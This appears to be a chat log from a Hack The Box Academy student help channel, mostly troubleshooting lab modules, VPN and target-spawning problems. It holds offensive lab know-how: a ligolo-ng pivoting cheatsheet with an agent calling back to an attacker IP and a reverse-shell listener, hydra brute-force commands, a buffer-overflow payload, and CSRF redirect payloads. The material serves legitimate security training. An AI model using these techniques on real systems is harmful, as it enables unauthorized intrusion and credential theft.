#modules
what do you use to write your technical and non-technical documentation?
Usage, Server
sudo ip tuntap add user [your_username] mode tun ligolo
sudo ip link set ligolo up
sudo ip addr show ligolo
./proxy -autocert
Usage, Client
./agent -connect [attacker_ip]:11601
Add network route to access victim subnet
sudo ip route add [victim ip-subnet] dev ligolo
Start proxy
start #start tunnel
Now you are able to scan for internal machines and act like the devices are on the same network.
Jumpbox, Connections back from internal victim -> victim -> attack_machine
To do this we go back to our agent-cli and use the following command:
listener_add --addr 0.0.0.0:30000 --to 127.0.0.1:10000 --tcp
damn, doesn't seem so bad lol
ligolo-ng cheatsheet if anyone wants it
I just tried ligolo-ng also, but haven't tried it in the Attacking Enterprise module yet
how about double pivoting?
To do this we go back to our agent-cli and use the following command:
listener_add --addr 0.0.0.0:30000 --to 127.0.0.1:10000 --tcp
then we can host reverse shells on 10000 port
The Pivoting Lab SnapLabs template: https://jh.live/pivoting
pretty sweet video
I mean I haven't tried any of this, it's all based on what Johnny said
agree just watch it
I am currently following the CPTS path and I am on Active Directory Enumeration. I find it hard to grasp all of it; can I skip to the next module (Web Proxies) and do AD after that?
or is it not right to skip it rn?
What does without blocking the calling thread mean here? What is calling thread and what does it do?
"calling thread" is the thread/process that executes this function. In the programs you have done you probably only had one thread, the "main" thread, but in programming it is possible to have several "threads" run in parallel and work at the same time. This can be useful if you have some operations that take very long (like reading a file from disk or downloading one), then you can offload these tasks to one thread while the original thread continues doing other work
Is this sharing of workload called multi-threading that we do in programming? I have worked with multi-threading in python to finish a task in a very short time.
yup, and as the name implies multi-threading just means more than one thread. The issue with "blocking" (in your example above) is if you have, for example, an application that runs a user interface, then the user interface could run on the main thread, and as soon as someone presses a button in the UI to download something and the download is also in the main thread but blocking, then the whole UI will freeze until the download is finished. That's not very user-friendly
Now, let's say the head chef (calling thread) decides that it's time to start baking bread. The head chef initiates the process by calling the baker (another thread) and saying, "Start baking the bread now." In this analogy, the head chef is the calling thread because they are the one initiating a specific task.
Understood. That clears it up mostly. So, in our powershell command, it will download the file in the background I guess and let us use the CLI as well?
That was a great example, thanks a ton.
I am in the Metasploit module and I saw this scenario where you are not given permissions to delete stuff. The module goes in a way where you gain higher privileges. So what can we do when we don't have a way to escalate? How do you delete your trace?
Any ideas on this?
...
this is more like HTB feedback.
if you have such leftovers in the system and can't delete them then you need to put them in your report (same as any new user accounts you may create) so that they can be cleaned up after your pentesting is over
My head hurts.. damn it..
try different exploit maybe
thanks
does spawning target work for everyone
ah. worked. no, I just need to figure out how to read the damn thing
I am still having problems with targets spawning. Does anyone know why this is happening?
I took a break from it and did the rest. Now I need to go back and continue the AD lab
I changed VPN to the EU server and it worked
Been going through man on ||ncdu|| but can't figure out how to read the file. Any hints?
Upstream issues I have heard. Contact support.
almost there try a little bit. read the thread again -x
attacking common services - medium
I used subbrute and found app.inlanefreight.htb; afterwards I tried a zone transfer
then I saw a hint to nmap -p- but when I do that for some reason there is no return
I used a normal nmap scan and found SSH, FTP (2121), DNS
I tried to brute force the FTP with hydra
now I'm brute forcing SSH with hydra hoping it works
anybody wanna push me to the right track?
Yo
There is a high numbered port that's missed here I believe. One of the services has a wordlist or something
How is this used in the context you were talking about? Is this a method for dropping files with SQLi?
I'm unable to get a full scan with nmap -p-
so I rushed it with nmap -p- -T5
hoping to get it faster but nothing showed up
Yeah, it's some stupid high number like 35000+
do I have to wait with just nmap ip -p-?
Is there a firewall?
What other args are you giving
was giving nmap -T5 ip -p-
nope
I gave nmap -sV -T4 -p- {ip}
You sure? Are any ports coming back filtered?
alright, I will give it a try
mine took about 2-3 mins
nope, when I tested just nmap ip it works fine
try also using -v and --stats-every 5
-sV is service detection. --source-port 53 or -Pn could help for a quick scan
you'll be able to see how long it's taking
can I DM so I don't spoil it for him
DM me?
yea
Why
.
I don't know what box you guys are talking about, I'm just offering advice
oh nvm then, I don't think the flag is visible without -sV, that's all
I had no issues with sudo nmap -p- ip
This one doesn't have the flag in the version
ah must be a diff one
They've changed this one a few times
Yeah I'm just offering advice.
Sometimes I will just do a quick scan and not service detection if I suspect there to be a high port or if the low ports don't seem to yield anything.
Then I'll banner grab and look for versions based on banners. If I see nothing there, of course I'll have to use nmap for its good fingerprinting service detection.
This has nothing to do with version info: it's all about enumeration and trying things
Sometimes anonymously
But if you don't know the port then you're sol
my nmap ip -p- finish time is 2hr and it is slowly increasing
You might need to restart the lab and wait a few minutes
Sounds like you might need to change vpn regions then
Connection issue, it shouldn't take 2 hours
I'm using the pwnbox
Yeah it's tough when them ports are up high and you don't do a comprehensive scan right off the bat.
In HTBA though I would say you should approach the boxes more professionally than you would on a HTB box. In HTBA you can really practice your methodology and in HTB you can try to be a speedy boi.
Changing vpn regions would still affect it
But first try resetting the lab
General question: when I'm on a reverse shell and got creds to another user, and I have nowhere else to use them (no other services to log into), I'll want to use runas. Unfortunately, the password prompt closes immediately; how can I bypass/overcome it?
well that's great but I don't know how to do it fast or professionally
I will try and change the VPN; I reset the lab a couple of times already
Try relogging into that service with the new creds
I can't relog into the service, it's a rev shell from a web application deserialization attack
Wild concept: log into the web app with creds?
That's what practice is for.
HTBA does a great job of describing a penetration testers role in a real engagement.
You have targets in your scope, and you need to make a non destructive comprehensive analysis of any security issues, while documenting what you find to be replicated and reproduced, and then provide simple suggestions on what the client can do to fix it.
Not really a web app, sorry. It's an IIS webserver vulnerable to deserialization attack
I have a problem with the Bypassing Basic Authentication lab. When I intercept the reset request, change the GET request to HEAD and forward it, I am again prompted to log in. Did anyone have the same issue?
Consider that things are going well right now
It would be very interesting to download this chat and make a model that filters for all problems with boxes and labs and find the solutions people replied to them.
Then use that model to gain a deeper understanding of what people can truly do to move forward with their labs and boxes.
Seems like a big thing that happens is we get a little disoriented; may be on the right path but simply get off track or down a rabbit hole.
Totally agree. I left the mentioned section for now and moved on to the next ones. Will come back to it after. Meanwhile, if you have any recommendation for it I will appreciate it.
Reread over the lab material. To me it seems like it's working as intended. As I was talking about you may be getting a bit misguided. Thinking you are off track when you may not be.
hmm, still don't get it to work...
must be missing something here
thanks, no clue why T5 had issues; after waiting like 20 min I found the port
Hey Guys! I'm struggling a bit with the module "Pivoting, Tunneling and Port Forwarding." I'm looking for extra sources of information regarding this module. Is there any introduction or recommended book to understand this module better? Thank you so much!
hi there, yet again with the Linux Privesc module
in the logrotate section, from what I understood, root should rotate the logs in order to trigger the race condition which logrotten exploits, but it never rotates and keeps stuck on that
Having connection issues here. The US Academy VPN is lagging. EU is too slow for the Pivoting RDP exercise.
Hey, has anyone completed Procedures in the Intro to Assembly Language module? I'm having a bit of trouble
Just did that. Make sure to run the payload while you echo some random text into the log file to trigger a rotation
I believe it's because the T5 argument doesn't allow the nmap socket to connect for long enough to retrieve the banner. Could try going to T4 instead to avoid this issue if you suspect it to be happening.
T3 is default nmap speed if you do not specify the flag explicitly.
I ended up using CA (Canada, I believe), low ms
That's pwnbox location, separate from vpn
Yeah the US VPNs don't let me spawn the target. EU 1 spawns but I think it is so slow that I can't complete the RDP connection in the SOCKS Over RDP section. Will keep trying EU in the meantime.
Like, currently or in general? I was just connected to an rdp session on a US server pwnbox yesterday.
The portion that requires you to proxy all traffic through RDP and connect to the last machine to get the flag. Bandwidth seems to be so bad at that point that the connection drops even after setting mode to Modem 56K
I skipped Double Pivot section after trying for 2 days, will attempt it at last
I am unable to spawn targets in the US either
I am at the skills assessment for the Injection Attacks module. Anyone here to discuss some methodology about XPath injection? I can basically enumerate the XML file but I am struggling with extracting the data.
did so but still
is there someone who has problems with spawning targets or is it just me?
I had small delays today, but nothing bad
All day yesterday and today. Switched VPNs TCP, UDP... locations, everything.. Targets won't spawn at all.. Trying to open a ticket but been waiting an hour and a half
all these problems probably happen because so many YouTubers are recommending HTB and they weren't ready for the crazy amount of people on their servers. That's my guess
I'm also trying now for hours but it just won't work
You can DM me
maybe
hello, can anyone give me a hint for Attacking Common Applications - Skills Assessment II - What is the admin password to access this application?
I already tried to register a new account but I got rejected
Hey, so my dad is gonna buy me VIP if I just get more progress in academy, so I am doing the basics. :) Anyway, I am stuck where it is asking for the htb-student mail location. I tried telling it /var/spool/mail and cat /etc/passwd and the location that returned for mail, and none of them are working. What is it wanting here? Here is the exact question: "What is the path to the htb-student's mail?"
env
Just because the folder may not exist doesn't mean that's not where it is
alr ty, for future reference, what does it mean by mail?
huh ok, ty :)
is something wrong with HTB right now?
literally this is the right syntax to connect to the database
even tried with the sudo command too
capitals?
SQL isn't case sensitive
SHOW DATABASE;
it what ... how did I not know that XD
you might need the -uroot it says
I see in the image here that it is just -root
:)
lmao, nowhere did it mention uroot in the module section
is that an error you think?
that's not an error; -u <user> to specify the username to use, standard SQL CLI syntax
-uroot, not -u *space* root; is that the same?
yeah, I messed up the syntax actually lol
y
my bad entirely,
oh alr ty
Hello everyone! On the skills assessment in the Web Attacks module I got the user and the token but I can't change the password. It says access denied. Can someone give me a hint what to do next?
found it
Dumb question, but I'm kinda new.
A lot of metasploit modules just use meterpreter's reverse shell
Which seems to be using my own private IP and not the tun0 IP
How do I get it to not do that?
Do I even need to?
Are you setting lhost to tun0 or it's ip?
yes it should be your tun0 ip, set lhost <ip>
the module in question here doesn't list an lhost as a basic option, is that just something that's universal?
if it's a reverse shell you need to set the lhost properly
you might be restricted through post requests
ah, well 'set LHOST' seems to be valid, even if it's not an option on the module itself so I guess it's just a universal option you can set on all of them.
Depending on the payload selected, the LHOST option might not show up. If you're using a reverse anything payload, it should be there though.
yeah, after I wrote I found it myself, thx
now I am stuck with XXE
still need help?
yes please
managed to pass that too, I just needed to tweak some shit; this thing was not that hard after all
I'm hacking today. 8-)
I am in the skills assessment of XSS in CBBH; my terminal is showing "Closed without sending a request; it was probably just an unused speculative preconnection". Is my script wrong?
nevermind! got it
can anyone help me with something? I keep getting an error when I try to open one of the machines (I'm in the tutorial)
Oh, I finished the getting started module but don't have enough for the next one.
Sadge.
ah yeah, I messaged diablo about an hour ago to let him know
Or perhaps they pushed what they believed to be a fix and are asking if your issues have since resolved
no need to publicly bash what you assume to be "nothing happening" when they're probably still trying to fix it
yeah agree, my mistake for crying out loud
it's just been about 9 days or even more, so hopefully they can fix the issue in a month
Shit happens, purportedly it's an upstream issue through their hosting provider
yep, and that's even worse as it's not really up to them
so they're doing their best. Just doesn't help much on support response times when everyone is messaging support ¯\_(ツ)_/¯
Should be quite simple one word answer
the exact name is one of the submodules you did prior to this question
https://academy.hackthebox.com/module/67/section/640
Windows Privilege Escalation -> Credential Hunting -> Search the file system for a file containing a password. Submit the password as your answer.
I found 2 passwords and both incorrect... any hints?
Will say first letter is capitalized
make sure there's not a space
Hey guys, I am a CS student, but my academic focus is more on hardware. Do you reckon I can just jump into easy ones or should I read up on something in particular first?
I found 3 passwords and still incorrect =/
Working on the Footprinting Lab Medium using the pwnbox. Launched Remmina and I get a popup re: a news feed. I cannot use Remmina without dismissing the popup, and I cannot find a way to do so. Anyone encounter this issue and have a solution?
if you're new to it, I'd definitely recommend the 'getting started' and 'linux fundamentals' modules on academy
alternatively, if you're feeling confident, you can have a crack at the starting point machines and see how you get along
Thank you!
OMG the target finally spawned!!! 
Really stuck at AD Enumeration & Attacks - Skills Assessment Part II. One of the last questions: Submit the contents of the flag.txt file on the Administrator desktop on the DC01 host.
|| I've got CT059 hash, cracked it. I'm trying to run runas /netonly, but I need an interactive shell for that. I have the Administrator hash of MS01.
I'm trying to set up an RDP connection now but that machine performance is giving me hell. ||
did you do something with the GenericAll rights
|| I found CT059 has GenericAll over Domain Admins, yes. ||
yes did you take advantage of that
also your messages have answers in them; either redact them or put them in spoiler tags
Well I'm trying to... I'm trying to authenticate as that user with /netonly
Working on same box but not encountered any problems as yet
Thanks, fixed that.
you don't need to login locally as that user
What do you mean? I'm trying to add that user to the Domain Admins group... how else could I do it? Can you point me to the right lesson on HTB / give me a nudge?
downtime
hackers
Got it!
can anyone help? I am doing the Footprinting medium lab and I have RDP running. I have the credentials for 'sa' but can't connect to the SQL server. If this is normal then fine, I'll try to work out what needs changing, but if not I may need to reset the box..
run as admin
I did try that, but either the sa account pw is not the same as admin or, when I type the "@" symbol which is in the password, it's going through as something else. Thank you though, I'll keep trying
Yeah, it's going through as " ' "
probably a keyboard layout issue? see if you can copy it over instead
there isn't a paste option, I'm just going to open PowerShell and figure out which key is @
found it. Thank you @next bronze
You can definitely copy/paste lol
Ctrl-c/ctrl-v
Just tried it again, doesn't work... not sure why
I can paste into normal fields but not the admin pw one
I don't think the UAC gui lets you paste the password
hecker
Maybe. But you can always log in as admin
That's what I did, it was just a keyboard layout problem. My ' and @ got switched round
yep
I dm'd you. You are going to feel silly but don't. HTB is "tough" sometimes. Let's just put it that way. I bet I spent longer on this than you.
Module: ADVANCED XSS AND CSRF EXPLOITATION
Section: Lab Warmup
Question: Use the lab components to exploit the CSRF vulnerability to get your user promoted to administrator
I am having trouble making the simulated user execute the CSRF. I'm using the following JS payload, which works when I visit the page, but the simulated user does not seem to do an actual user promotion:
window.location = "http://csrf.vulnerablesite.htb/profile.php?promote=htb-stdnt";
I have tested the same logic to check if the request gets logged, and it does get logged, confirming that the code actually gets executed by the simulated user:
window.location = "http://exfiltrate.htb/test-csrf";
Having a bit of trouble understanding LLMNR poisoning. I understand how to do it and what's happening, but how often is it that a machine will perform a query for LLMNR/NBT-NS? In the lab environment it makes it look like it always happens, but I figure that's not the case in the real world?
So I'm in the Windows Event Logs & Finding Evil module, and came to the question "Analyzing Evil with Sysmon and Event Logs". The question asks: "Replicate the Unmanaged PowerShell attack described in this section and provide the SHA256 of clrjit.dll that spoolsv.exe will load as your answer." So I ran the PowerShell attack, but Sysmon logs aren't showing any activity for the last 30+ minutes
I clicked "refresh" on the actions pane, but nothing new loads
tried closing Event Viewer and reopening it with no success
Help please
My account on Facebook got hacked
We can't help you with that
call mark, we can't help you
Why
Reach out to Facebook support
uhhh
They've done nothing
Then you're SoL if you can't log back on and change your password
Take it as a lesson not to download/click random shit
are questions like that pretty common in here? lol
At least 5x a week
I just assume they are trolls
Or misinformed/don't know how to read the basic #welcome of any discord
did you kick the guy lol
Nah, but fancy green shield.
Is there anyone here who can tell me why the flag I got on the SQLMap Essentials Table#5 is wrong?
Check for whitespaces.
Can you dm me?
Hello!
In the module Firewall and IDS evasion hard lab
I'm stuck, is there anyone who can help me with it?
I don't understand why Microsoft would have LLMNR use a user's hash; it doesn't really make any sense,
could it be because the DC needs this info? Really bizarre, idk how Microsoft didn't see the danger
just fk around in the GUI, or search up how to write a query to find a specific user
I am getting the following error on the HackTheBox Academy webpage:
We are currently facing some issues with targets spawning Try switching VPN servers and respawning the targets
I changed VPN servers, but that did not help. Anything else I can do to fix that?
sometimes starting other modules will allow u to start the other, but overall I'm getting the same issue; trying to go through AD modules, tried starting others, switching servers etc., still won't spawn an instance.
Same here. I am in the AD module and I can't spawn any VM even after changing to different VPNs.
yeah, really annoying; it's been like this for a few days for me
Hello,
I'm considering the student subscription plan and would like to know: Once my subscription expires, will I still have access to review the modules I've already completed during my subscription period?
as long as the module is completed, you'll have full access to it regardless of plans / subscription expiry
yes
alright, thank you very much
I am done with the academy and only have notes on one computer, and the modules have helped me to help other students I know get to the answer when they are really frustrated
the updates on the modules are also free but you have to keep checking to see when they've been updated
yo
I'm stuck on this as well, do you have any tips?
that's a good module
Thanks friend. I'm not new to programming (like, really not new) but the infosec world is rather spicy haha.
I'll be alright but it's just like development. There's usually the equivalent of a missing semicolon somewhere
how can I close this
Are y'all still facing these issues with spawning machines too?
try to add the server port in your payload, or actually you can remove all the domain part for the redirection; in this case that will work.
Yes, Windows will do that by default if it can't resolve a name using the DNS server configured at the domain/machine.
Recheck if the Sysmon process is running correctly with the specified configuration. It seems to be a problem there
Sysmon was running with the correct config. I had to kill the target VM and respawn it to get it to work properly.
anyone know how to remove ingested data from BloodHound?
I would say just restart it :>
What worked for me was to switch the VPN provider (not for the pwnbox) from US to EU. It looks like the US has some issues

When World of Warcraft got DDoSed for a little less than a week they gave everyone a free month of subscription
HTB too stingy for that
HTB is a good sponsor of community events and gives away a lot of merch to encourage people to play the CTF and just do CTF in general.
They are not stingy.
Is somebody able to tell me why (when employing the find command) that "*.extension" is different than the same thing without quotations?
I read online it has something to do with the wildcard aspect of *? I couldn't make much sense of it as a supernoob rn
I'm using the Docker version; even if I restart, it retains
hi, I forgot to cancel my subscription, and HTB academy charged me $490. I don't want to subscribe for 2024, and I want to get the money back. Is there any way that I can get my money back? Which email should I send to for this question?
It's so fucking hard to find the "cancel subscription" button
how to remove ingested data from BloodHound
clear sessions/databases
"You can either hit "Clear Database" under the Database info tab, or just start a new database by pointing the Neo4j gui to a blank folder. It'll make a completely new database for you in that folder"
there are three input files here but idk how to remove them
they are conflicting and giving wrong results
Just purge the whole db
it says recreating database but it was still there :(
reach out to support
Has anyone managed to spawn any lab module boxes? After yesterday, I cannot spawn anything no matter which VPN I switch to. Only EU 1 works, but that too not always.
And it's extremely slow.
I've been facing this for months now.
ahh, it's so frustrating, how do I delete those dbs
What do you need help with? Clearing the Neo4j DB?
Make sure your Docker compose file exposes the Neo4j UI and Neo4j DB ports (they're commented by default), and then after logging in to Neo4j UI, run this query: https://neo4j.com/docs/cypher-manual/current/clauses/delete/#delete-all-nodes-and-relationships
Neo4j default credentials are mentioned in the Docker compose file.
This is for BloodHound CE. I'm sure the other editions work in the same way.
DM me
Hello! Is everyone having problems with spawning targets?
Footprinting Lab - Hard
How can I find Tom's password?
I found it but the password is not written
Hi everyone,
I'm doing the Intro to Assembly Language, Skills Assessment 1. I am getting constant Traceback errors with python that won't allow me to execute anything when using pwntools. Does anyone know how to fix this?
I have been unable to generate a target machine today, it's crushing
can someone help me with "Intro to Assembly Language skill assessment part 2"? I have code but it is not working
hello
hello
how's it going?
Will we find Tom's password with smbwalk?
English only, #rules
You should exhaust all tools before asking for help
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
I found the community name but it doesn't give Tom's password
You gotta use it with a tool to find a password
well I mean smbwalk isn't necessary. Just easier
The braa command is very succinct as well
The braa syntax they give works wonders
Btw you can't post large blocks of text, you need to link your app.hackthebox.com account to the discord, read #welcome
Second, add ``` before and after large blocks to allow people to read them easier
But I can guarantee that both smbwalk and braa with the string you get from onesixtyone will work
ah true, braa is a tool. Thought it was a compiling tool for some sick reason lol
Lol yeah, the output from braa is waaaaay shorter
@fathom pendant is it true that TGT pre-auth must be disabled for a Kerberoasting attack?
idk, if you know you know
¯\_(ツ)_/¯
never mind, Kerberoasting is based on user accounts and passwords, but AS-REP is (possibly) vulnerable if pre-auth is disabled because of timestamp encryption issues
Recently my team had a discussion about what the exact difference between AS_REP Roasting and Kerberoasting is.
As we were short of time, we did not come to a concrete answer and were also not able to find an article that explains it in short.
I am neither a professional with years of experience nor a Kerberos guru. So if you are looking for a ...
Are the SSH prompts for target boxes super laggy for anyone else? It literally takes seconds to respond to writing commands, let alone executing them.
@vivid igloo ask here, my DMs aren't open
reinstall pwntools, also what error
Hello everyone ... I'm stuck on Password Mutations inside the Password Attacks module.
the question states: Create a mutated wordlist using the files in the ZIP file under "Resources" in the top right corner of this section. Use this wordlist to brute force the password for the user "sam".
I know the machine is running a couple of things ... so what I tried until now is, after mutating password.list with custom.rule, I ran crackmapexec on SMB and hydra on SSH with no results after at least an hour of running.
Do u guys have any tips?
PS: I used hashcat to mutate the list
Don't attack SSH
FTP should also be open, and you can increase threads with hydra
hey so I was doing a bug bounty and in a certain request I modified a param in the request and am getting a 500 internal server error
that's a bug right?
@fathom pendant
@fathom pendant Thank you
Don't ping me
ok
Ah this has nothing to do with academy, read #welcome to find out how to access more of the server
ok
You need to supply it with a site or ip I believe
The module that refers to it should give you the syntax
Or aquatone -h?
in Web Proxies, between ZAP and Burp do we have to use one of them or both?
coz I am comfortable with Burp
Unfortunately there isn't much info in the module.
You should be able to throw a site at it
with what kind of URL?
Any? Idk, I didn't really use it, it's clunky
For example, but this URL is not okay ^^"
And the question: I tested all 3 words on this page and it is not okay
What is a header 
You mistyped one
Also make sure you don't have extra spaces
Message support then dude
If you believe it's a technical error not letting you pass it
What module/section is this?
Yes I do I wait
ATTACKING COMMON APPLICATIONS
Application Discovery & Enumeration
Maybe it's expecting Of to be capitalized
are you sure there's not an extra space at the end
nope ^^"
yes
I finally found it, thanks
Aquatone is not complicated
Hey ... I'm sorry to bother u again ... I'm almost at password 30000 on the mutated password list with no hits; I raised hydra to -t 32 and let it loose on FTP as advised.
those are the only ports I can see open on the machine ... 21, 22, 139 and 445. I attacked SMB and SSH (stopped attacking after MarcielLee's advice) and now FTP.
a -Pn -p- scan doesn't give results back after 15 minutes, so I don't believe there is a port beyond the standard search.
It should work just fine
SMB you might need to add --local-auth
For cme
okay, thanks again ... I will try that
try a valid answer
I can't SSH or RDP to any target.. anyone experiencing the same?
attacking common applications - osTicket.
a huge skill issue apparently. I have the password I believe, but the user to log in with I just can't find
change VPN server and respawn the target
there's a big banner stating that on the website already
omg that worked, tysm, I was pulling my hair out
you can just remove the container, don't even need to log in to neo4j
docker container ls
# find the container that ends with "graph-db-1"
docker container rm <that container>
docker volume rm $(docker volume ls -q | grep neo4j-data)
I tried removing all containers but it still retained
but I didn't remove the volume, I see
For the password attack modules: Create a mutated wordlist using the files in the ZIP file under "Resources" in the top right corner of this section. Use this wordlist to brute force the password for the user "sam". Once successful, log in with SSH and submit the contents of the flag.txt file as your answer.
How long is this supposed to take?
I've made a mutated wordlist using hashcat and I'm using hydra to log in as sam for SSH
the estimated time is 19 hours
Do I really wait here for 19 hours? I've been waiting for about 30 minutes
nope
its not 19 years but might be 1
Ur doing something wrong
that's what I'm thinking
nah it takes a very long time. But try splitting that mutated list into different b-words, c-words etc
i turned up hydra to t 64 too
run multiple instances?
to cut my time or something
no, just split the words and you can sort out that list
etc
so like if you tried all a words, you can try the b list. Also run the attack against ftp and not ssh
what do you mean?
by sort
oh, the question said login with ssh so I assumed to use ssh
password reuse
just split up the list so it doesn't take so long. it's going to take a loooong time until it hits the z words etc
does hydra not let me know found credentials as it's running..? or does it wait until the end to say it
Otherwise i don't get what difference it would make splitting it up if it's just going to go through all the same words
i mean yes
password reuse..?
Sometimes people have the same password for multiple services no?
Unsafe practice but exists
aah that's what you meant. I thought you were implying that it was going to be the same unmutated passwords as before lol
Haha oh no sorry
Ssh is notoriously slow to brute-force
yeah that's a mb because i didn't scan the service for anything else, i just assumed to use ssh since the question asked for it
you have like a list of the fastest to slowest things to brute force?
or a quick rundown from memory
just something to always keep in mind! No worries, ftp is much faster to brute force
It says to log in with ssh to get the flag, but that doesn't mean you have to brute force that service specifically, there's more things running on the box
yeah i tunnel visioned
this command is right though right: hydra -l "sam" -P plist.list -t 64 ftp://IP
Don't have a list, ssh is just super slow, FTP is quite fast, smb and rdp are somewhere in between, just observation
yeah make use of whatever is running, but kerberos/ldap is usually the fastest then http/s, rdp and ssh are some of the slowest
thats a good enough list for me.. just something for me to keep in mind
isn't rdp pretty slow or am I remembering wrong, but you don't usually brute rdp
Oh yeah, Kerberos, right, kerbrute goes brrr
It's slow, I think not ssh slow, but I could be misremembering too
yeah usually there's no reason to brute it outside of trying one or two common ones
Hi guys, I need some guidance, if you can help me. I'm stuck on the "Passwd, Shadow & Opasswd" lab for the Password attacks module.
I've been trying for days to find Will's password, I used the resources provided for the lab, mutated the password and used the custom rule provided, tried the password list generated on the ftp and Smb services that are open on the target, but the password cannot be found. Can someone hint me where I'm going wrong?
Pretty much, I check for RDP after I have creds generally
rdp and winrm for sure haha
is this only for PC or Android too?
You could probably try academy from android yes. External keyboard would be helpful and it's probably a bit painful.
Can someone tell me where can i ask for help for buffer overflow
run $(python -c "print('\x55' * 786 + '\x90' * 100 + '\x44' * 150 + '\x66' * 4)")
after inserting the following payload, I should have the value in the EIP 0x66666666 but I continue to have 0x44444444, it is in the buffer stack overflow module
can someone help me
That's not really in scope for this channel.
I logged in with imap, but I cannot receive messages, it gives an error.
Imap requires a prefix
I haven't done that module but presumably from the output, your offsets are off.
<literally anything> <command> <argument>
it is the same as the example but i added the () of the print but it is wrong even if i paste the example one
This isn't relevant to the channel, reading comprehension is a requirement
It could be the example isn't accurate then.
Then how did you get here
@vivid mica use this channel appropriately or the permission to speak here will be removed
Ok
it works from the ssh test but it is not working from my vm, i think because from the ssh the gdb is (gdb) and from my vm it is gef
Yeah. Environment changed so the offsets did too.
aslr is disabled for the target
but it shouldn't be the same?
@next bronze @haughty stirrup Forgot to say, thanks for the help I got it
Not necessarily nope. Different protections can be enabled on systems and just changing from GDB to not GDB for example will shift things slightly. Usually not a huge amount but a little bit.
ty so much
gef is just a plugin for gdb btw, so that shouldn't change anything
running on a different machine with aslr enabled would though
1 FETCH BODY[] ?
You still need to specify which item you're getting the body[] from
Force gpupdate
Anybody super familiar with DNS enum using gobuster? I'm working on the ||Devvortex|| box which I know has an exposed subdomain but no matter which SecList subdomain wordlist I use it's not finding anything
Hi, I'm working on the module Introduction to Windows Command Line and I don't understand how the answer to this question is not ||PackageManagement||
Reading the section should give you the answer
AD Beginner -> what ACL should i write, i don't know how to find it
@solid python
i added it but dcsync still gives me error
Make sure you're in the right user context
What module is this?
documenting and reporting
Did you do the privilege::debug?
Did you sign out and sign back in?
can anyone tell me why this is not working, when clearly the target is below and I am trying to nmap it?
Try changing vpn regions and respawning target
Did you try it with the -Pn like the error says?
the apt command mentioned in the module isn't working, the parrot guys aren't supporting it. I tried the pipx way mentioned in their installation wiki but it isn't working, any idea
I tried building from source but it is just taking a lot of time
same but better
thank you! switched to US vpn, now it works. The problem is that it still doesn't work on my kali VM, even though I am connected to the VPN
Yay! Small module, but it's a win!
Did you try sudo apt install cme? That installs crackmapexec which you can launch as cme.
Don't run pwnbox and vpn simultaneously
installing python packages with apt is not ideal as well. pip and pipx are designed for that
Anyone able to provide a sanity check/nudge for ADVANCED SQL INJECTIONS - Skills Assessment
(https://academy.hackthebox.com/module/188/section/2004)
||Have done a code review to find the vulnerable API and have a small proof of concept one liner to display boolean injection||
Hey Everyone! I'm currently enrolled in the SOC Analyst Path and I am in the Splunk Fundamentals module. I'm in the Intrusion Detection With Splunk section and I'm literally stuck in 1 question.
"Navigate to http://[Target IP]:8000, open the "Search & Reporting" application and find through an SPL search against all data any suspicious loads of Clr.dll that could indicate a C# injection/execute-assembly attack. Then, again through SPL searches, find if any of the suspicious processes that were returned in the first place were used to temporarily execute code. Enter its name as your answer. Answer format:_exe"
If anyone has solved this and could give me an idea, that would be great.
I did this but the syntax is weird. nxe works like charm though
hello,
is there any workaround for the bad remote desktop to the target machine ?
i am using xfreerdp and tried mrd and it is the same. all connections get cut after seconds
use tcp for vpn
I would recommend doing a basic search for the keyword clr.dll | stats count by ProcessName ParentProcessName so you can sort by related process the exact query doesnt have the right syntax but you should get the idea. One more thing you can do here is research common processes that are used to execute malicious code as the answer to this question is something you will surely get used to seeing.
even though it's terminated, I still cannot nmap it on the kali VM.. I think I can't connect to the VPN for some reason..
There have been issues
You downloaded a new vpn after changing it for pwnbox yeah?
yes, I have. The US-1 vpn file
Just making sure, bc I've done that before lol
hey I can't find this answer but I did what is in the module ATTACKING COMMON APPLICATIONS Attacking WordPress
Why not check /home/
But also I do see a user in your screenshot
I am in the mainframe.
but still it's super strange, since it says I'm connected to the vpn, and my IP doesn't change..
Ah it's arbitrary file-read
webadmin and mrb3n
look for wordpress users, not system users
how?
Ohhh that makes way more sense
$Webroot/wp-users/ or something like that yeah?
can't remember off the top of my head but yeah
Woah the website finally now offers a visual warning when they expect their servers to have problems spawning targets! It shows up at the top of the screen in a red bar for those wondering.
There used to be a way to find wpusers with ?author=0, or ?author=1.
Does anybody remember that?
this?
No
$webroot was my way of saying whatever backend service webroot is
use wpscan
They just added it
It happens to be misleading because I spawned pwnbox and the target. I'll take the victory. 0 packet loss.
It's not misleading bc other users are experiencing issues lol
I get it. Just saying that because before I would have issues when I didn't expect to but now this time I expected to and then didn't.
anyone has idea why after supposedly being connected to the VPN on Kali VM, it still doesn't change my IP?
Are you looking at the correct interface?
In my case, I don't use my wlan0 interface, or in other cases perhaps my eth0 interface. Instead, to connect to HTB I would use my tun0 interface.
Your ip won't change, it's a split tunnel - not a traffic redirect
looking at tun0, but it remains the same
Try using the tun0 address.
Your tun0 if you're only running the htb vpn will be like 10.10.x.x
If you're using other tunnel vpns then it'll be whatever tunX that was set when you ran it
well mine is 10.10.16.66
I am trying to scan this
so I just nmap this target and it just remains blank
That's probably because nmap is using your wlan0 or eth0 address by default.
I used it but I have no users
Probably an error log will show
Also if you have multiple htb vpns running that can also be a reason
I restarted the machine but didn't help
it's strange that after the Initialization Sequence Completed, there are these 2 messages.. shouldn't the "completed" message be last?
Nope those last bits are normal
Try this, after connecting to the VPN.
Add -e tun0 to the arguments
For instance,
nmap -e tun0 -sV 10.13.33.70 -v
unfortunately, doesn't help... btw does this ovpn connection work on a pwnbox machine at all, or is it meant to work only on labs?
It's likely a thing relating to the spawning issues
Ah I thought you were in your local machine. You're experiencing these problems from within pwnbox?
You may need to change vpn regions
No they stated the issue is within their kali
What was the error it said?
The pwnbox links to the vpn automatically
so I switched the VPN again, now I have a tun1 interface as well, but when I nmap the pwnbox, it still remains paused
You should close the vpn when you change regions/download a new one
sudo killall openvpn
And start the new one
yes I did that, also downloaded the new one, and started it.. but still xD..
If you have a tun1 then there's another process that is still holding the tun0
yes but I must have a user to use webroot?
the only thing which has changed is that I have a tun1 interface, before it didn't even appear when I was connected to a different region
Restart your vm then run the openvpn command again
you would really help me, I think if I don't stop for today I am going crazy in front of this chapter ^^'
Dude I haven't done this module just proposing ideas
I understand no worries
Can anyone do a sanity check on Advanced CSRF module, section XSS Filter Bypasses?
